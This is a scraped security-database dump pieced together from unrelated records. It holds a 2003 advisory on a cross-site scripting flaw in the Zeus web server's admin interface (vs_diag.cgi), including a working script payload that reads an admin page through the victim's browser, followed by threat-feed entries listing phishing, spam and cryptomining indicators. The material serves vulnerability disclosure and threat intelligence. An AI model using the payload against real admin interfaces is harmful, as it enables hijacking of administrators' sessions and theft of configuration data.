This is for IE, for other browsers you may modify this code.
Imagination is the best friend of the attacker. Open your minds, XSS does
not only means execution of commands on the client side... succefully
exploited, in some scenarios (like web admin interfaces) those bugs can
lead on execution of commands on the server side...
See you,
Hugo Vбzquez Caramйs & Toni Cortйs Martнnez
INFOHACKING RESEARCH 2003
www.infohacking.com
Barcelona
Spain
{"id": "SECURITYVULNS:DOC:4610", "bulletinFamily": "software", "title": "Another ZEUS Server web admin XSS!", "description": "\r\n\r\nHi,\r\n\r\n\r\n\r\nanother XSS, now on the ZEUS web admin interface.\r\n\r\nThe tested software is Zeus 4.2r2 (webadmin-4.2r2) on Linux x86\r\n\r\n\r\n\r\nThis is not the same issue as bid 6144 (index.fcgi),\r\n\r\nnow is on "vs_diag.cgi".\r\n\r\n\r\n\r\nExploit is simple:\r\n\r\n\r\n\r\nhttp://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>\r\n\r\n\r\n\r\nI have read this post: (http://www.securityfocus.com/archive/1/302961), \r\n\r\nregarding "index.fcgi" XSS.Mr, Colin Watson, claims that XSS bug on their \r\n\r\nsoftware is not a big risk because: "The Zeus Administration Server uses \r\n\r\ncookies to record several items oftransient state: the state of the \r\n\r\nfolding list of groups of virtualservers, and the list of currently \r\n\r\nmonitored variables and machines ifreal-time monitoring is in place. It \r\n\r\ndoes not use cookies to store any security-sensitive information (...)" \r\n\r\n\r\n\r\nWho needs cookies? :-) ZEUS uses "Basic Auth" (base 64 encoded) for the \r\n\r\nsession tracking...but ZEUS does not allow http TRACE method, so we can \r\n\r\nnot run a XST (Cross Site Tracing) against it :-(\r\n\r\nI know litle about client side scripting, but probably there's some way to \r\n\r\nsend POST requests and... change the admin password?, stop the web \r\n\r\nserver?... I'm quite sure there's some way to do this.\r\n\r\n\r\n\r\nWith the script we show below an attacker can do an HTTP request to the \r\n\r\nweb admin interface of the ZEUS and redirect the output... \r\n\r\nOf course you have to trick the admin...\r\n\r\n\r\n\r\nhttp://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()\r\n\r\n{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open\r\n\r\n("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send\r\n\r\n();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%\r\n\r\n20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%\r\n\r\n20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")\r\n\r\n</script>\r\n\r\n\r\n\r\nThis is for IE, for other browsers you may modify this code.\r\n\r\nImagination is the best friend of the attacker. Open your minds, XSS does \r\n\r\nnot only means execution of commands on the client side... succefully \r\n\r\nexploited, in some scenarios (like web admin interfaces) those bugs can \r\n\r\nlead on execution of commands on the server side... \r\n\r\n\r\n\r\nSee you,\r\n\r\n\r\n\r\nHugo V\u0431zquez Caram\u0439s & Toni Cort\u0439s Mart\u043dnez\r\n\r\nINFOHACKING RESEARCH 2003\r\n\r\nwww.infohacking.com\r\n\r\nBarcelona\r\n\r\nSpain", "published": "2003-05-30T00:00:00", "modified": "2003-05-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4610", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:07", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2018-08-31T11:10:07", "rev": 2}, "dependencies": {"references": [{"type": "oraclelinux", "idList": ["ELSA-2020-5654"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}], "modified": "2018-08-31T11:10:07", "rev": 2}, "vulnersScore": 2.7}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-02-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **103[.]28.36.21** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **14**.\n First seen: 2020-12-25T03:00:00, Last seen: 2021-02-24T03:00:00.\n IOC tags: **generic**.\nASN 131353: (First IP 103.28.36.0, Last IP 103.28.39.255).\nASN Name \"NHANHOAASVN\" and Organisation \"NhanHoa Software company\".\nASN hosts 40665 domains.\nGEO IP information: City \"\", Country \"Vietnam\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-25T00:00:00", "id": "RST:0930552B-4610-37B6-86F4-F01173C15E44", "href": "", "published": "2021-02-25T00:00:00", "title": "RST Threat feed. IOC: 103.28.36.21", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **boxberry[.]id097483.ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-05T03:00:00, Last seen: 2021-02-24T03:00:00.\n IOC tags: **phishing**.\nDomain has DNS A records: 45[.]147.197.110,212.8.245.252,190.115.18.100,87.98.180.6,116.202.0.200\nWhois:\n Created: 2020-12-05 16:42:02, \n Registrar: REGRURU, \n Registrant: Private Person.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-05T00:00:00", "id": "RST:E6DE2D5B-4610-3C66-9BF0-9F300B70622C", "href": "", "published": "2021-02-25T00:00:00", "title": "RST Threat feed. IOC: boxberry.id097483.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **216[.]151.138.62** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-17T03:00:00, Last seen: 2021-02-24T03:00:00.\n IOC tags: **generic**.\nASN 13445: (First IP 216.151.128.0, Last IP 216.151.159.255).\nASN Name \"13445\" and Organisation \"Cisco Webex LLC\".\nThis IP is a part of \"**cisco_webex**\" address pools.\nASN hosts 426 domains.\nGEO IP information: City \"\", Country \"United States\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-17T00:00:00", "id": "RST:F76918EA-4610-30FD-9867-CA90F3FF6414", "href": "", "published": "2021-02-25T00:00:00", "title": "RST Threat feed. IOC: 216.151.138.62", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 chat-6.eu.api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **48**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 54[.]95.212.255,54.250.4.108\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:E72DEA49-4610-3631-B10A-4A76CEEC638C", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 chat-6.eu.api.binance.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 ltc.openvpn.f2pool.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **48**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 52[.]1.161.122\nWhois:\n Created: 2013-04-23 04:46:42, \n Registrar: Alibaba Cloud Computing Beijing Co Ltd, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:6DFAE96D-4610-36EF-83E8-2F450DBE13F0", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 ltc.openvpn.f2pool.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 stream1-0-6.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **48**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 54[.]95.212.255,54.250.4.108\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:EEDA6BBD-4610-3AE3-ADD8-DB5B24A6835A", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 stream1-0-6.binance.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 wood.suprnova.cc** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nWhois:\n Created: 2013-03-16 21:39:15, \n Registrar: unknown, \n Registrant: NAMECHEAP INC.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:21AC99C2-4610-3D90-8BBC-0CF84FEB739D", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 wood.suprnova.cc", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-21T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **elisabethtybiwinna[.]in** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-02-21T03:00:00.\n IOC tags: **spam**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:345F590A-4610-3155-B601-46D15965FF8C", "href": "", "published": "2021-02-22T00:00:00", "title": "RST Threat feed. IOC: elisabethtybiwinna.in", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **mail[.]joinwacimbrut.grub-invitt-36.gq** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-18T03:00:00.\n IOC tags: **phishing**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:3C731B8C-4610-3076-93A4-5623E1CB0CAF", "href": "", "published": "2021-02-19T00:00:00", "title": "RST Threat feed. IOC: mail.joinwacimbrut.grub-invitt-36.gq", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-14T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **lexstonesolicitors[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-17T03:00:00, Last seen: 2021-02-14T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-17T00:00:00", "id": "RST:F00435C1-4610-34C7-BC5A-CECC2AC61E10", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: lexstonesolicitors.com", "type": "rst", "cvss": {}}]}
